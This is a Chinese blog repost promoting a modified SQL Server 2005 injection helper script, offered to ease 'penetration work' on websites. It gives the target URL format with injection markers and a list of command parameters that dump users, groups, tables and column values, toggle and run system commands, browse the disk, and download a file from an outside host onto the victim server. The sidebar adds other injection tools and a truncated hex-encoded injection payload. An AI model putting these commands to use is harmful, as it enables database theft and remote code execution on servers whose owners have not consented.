Sql2005注入辅助脚本[修改版]

最新推荐文章于 2019-12-20 16:07:40 发布
最新推荐文章于 2019-12-20 16:07:40 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 脚本网页语言安全和网站攻防 文章标签: sql 脚本 c 工作 url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/3341795
版权
from hackbase

版权所有:
http://www.pcsec.org
BK瞬间群
感谢无敌小黄瓜的投递

原始代码可见http://hi.baidu.com/tr4c3/blog/item/da1c1c30c93da89ca9018e27.html
经过黄瓜修改代码,功能更加强大了,希望能给大家的渗透工作带来方便。

程序说明:
+========== =================== ================ ================ ===========  +

+             Made By tr4c3,Modified  By 无敌小黄瓜【bk瞬间群】                +

+========== =================== ================ ================ ===========  +

--------------
url.txt内容为:
--------------
比如:http://www.google.com/fuck.asp?id=2<sqlinj点>;--

正在注入的是http://www.xxx.com/index.asp?id=1 <sqlinj点>;--

--------------
参数:
--------------
sql2005 info
sql2005 logbackup
sql2005 users
sql2005 localgroups
sql2005 sqlfile
sql2005 disk
sql2005 pubs clean
sql2005 c:/1.txt mm
sql2005 turn on/off
sql2005 c:/ dir
sql2005 ver cmd
sql2005 "select @@version" query
sql2005 http://fuck.av/hacker.gif c:/1.gif download
sql2005 databases
sql2005 pubs tables
sql2005 pubs authors cols
sql2005 pubs authors au_id values
sql2005 pubs authors au_id id name pass vv
+=====================+
url内容  //注意get方式的有个?

http://www.google.com/index.asp?
id=1'
;--
GET

http://www.google.com/index.asp?
id=1'
;--
POST
Sql2005注入脚本

程序下载:sql2005.rar


iiprogram
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超级SQL注入工具V1.0正式版源码
03-31
C# vs2015开发 官方下载地址: http://www.shack2.org/article/1417357815.html 简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。 超级SQL注入工具支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。 超级SQL注入工具支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具支持Bool型盲注、错误显示注入、Union注入等方式获取数据。 超级SQL注入工具支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。 本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持全自动识别注入标记,也可人工识别注入并标记。 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
SQL注入
08-28
asp-sql注入源码
04-17
asp-sql注入源码(存在sql注入的asp源代码,供大家学习)
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
DNF万能注入器 易语言编写
04-25
万能注入器 可以注入任何DLL源码 绝对可用 万能注入器万能注入
Sql2005注射辅助脚本[粗糙版]
09-14
Sql2005注射辅助脚本】是一种用于SQL注入攻击的工具,主要设计用于Microsoft SQL Server 2005,但也可适用于SQL Server 2000。此脚本由Tr4c3创建,其目标是帮助在SQL注入过程中发现数据库错误信息,从而推断出...
注入辅助工具 内部版 注入辅助工具 内部版
12-18
在IT行业中,"注入辅助工具 内部版"可能指的是一个专门用于软件开发或系统调试的工具集,它能够帮助开发者或安全研究人员进行特定类型的代码注入操作。代码注入是一种技术,通常用于测试应用程序的安全性、查找漏洞...
基于PHP的一个在线打包压缩网站内容的PHP脚本(Hacklog修改版).zip
08-29
这个脚本是Hacklog原版的修改版,意味着它在原基础上可能增加了新特性或修复了已知问题,以适应更广泛的使用需求。 【描述】中的信息与标题相同,再次确认了这是一个用PHP编写的在线压缩工具,特别适用于处理网站...
JavaEE源码仓库管理源码数据库sql文档
最新发布
04-18
综上所述,这份资料包含了JavaEE 3.8版本下基于SSM框架的项目案例,其中不仅有完整的源码、SQL脚本,还有配套的文档和视频教程,是一份非常适合初学者和有一定基础的开发者深入学习和实践的宝贵资源。通过对这些资源...
万能注入工具
10-19
WEB.get.post注入工具.这工具很好用..不用不知道.,一用吓一跳
sql注入初探
小小鱼的博客
09-14 1437
了解漏洞: 什么是sql注入漏洞: 攻击者可以通过该漏洞提交一段数据库查询代码,根据程序返回的结果,获得非法数据。 分析漏洞原理: SQL注入产生的原因是什么: 程序员在编写代码的时候,没有对用户输入内容的合法性进行判断。 一个系统存在这个漏洞会导致什么后果? 数据库中的信息将会被黑客获取,如果数据库权限设置不当,还可能被攻击者获取写权限,写入一句话木马。 漏洞的复现和利用 环境...
SQL注入各类型 讲解及利用 (一)
lendq的Blog
05-07 1万+
简介: SQL注入漏洞产生的原因 SQL Injection 程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患 用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作 SQL语句 Structured Query Language 结构化的查询语言,是关系型数据库通讯的标准语言。 查询:SELECT st...
什么是SQL注入
热门推荐
weixin_40851188的博客
05-02 2万+
有人的地方就有江湖,有数据库存在的地方就可能存在 SQL 注入漏洞。 什么是SQL 注入SQL 注入是一种非常常见的数据库攻击手段,SQL 注入漏洞也是网络世界中最普遍的漏洞 之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一 般用的就是 SQL 注入方法。 SQL 注入其实就是恶意用户通过在表单中填写包含 SQL 关键字的数据来使数据库执行非常 规代码的过程...
sql 注入的经典语句
weixin_30632883的博客
07-02 72
&ozc=28;dEcLaRe @s vArChAr(8000) sEt @s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C4563...
邮件注册(一)
qxs101307204的专栏
10-21 434
1 关闭PHP版本信息在http头中的泄漏     我们为了防止黑客获取服务器中php版本的信息,可以关闭该信息斜路在http头中:     expose_php = Off     比如黑客在 telnet www.12345.com 80 的时候,那么将无法看到PHP的信息。     2 关闭注册全局变量     在PHP中提交的变量,包括使用POST或者GET提交的变量,
SQL中insert注入(4)
qq_41007744的博客
05-06 7742
insert注入第一种情况:插入数据查询如下:insert into table (col1,col2) values ('injectable','not injectable')原始的URL如下:?firstname=john&amp;lastname=smith请求被解析:insert into table (firstname,lastname) values ('john','smith...
value值报错SQL注入
SheXinK’s Blog
12-20 410
value值报错SQL注入1、 SQL注入介绍2、 报错注入PHP代码3、 报错注入测试4、 代码漏洞修复 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 报错注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,在...
Spring04---Annotation注入
chbxw
08-29 479
Annotation注入1.1 创建Bean 使用@Component1.2 做依赖注入, 在setter方法上添加@Resource1.2.1 测试添加1.3、设置多例prototype2、为了更好区分分层, bean的注解,不在使用@component@Repository("userDao") //@Repository一般使用Dao的注入 public class UserDao imp
SQL Server 2005管理工具与脚本编辑器
"本章主要介绍了SQL Server 2005中的常用工具,特别是SQL Server Management Studio (SSMS),这是一个全面的集成环境,用于管理和开发SQL Server的所有组件。此外,章节还提到了Business Intelligence Development ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值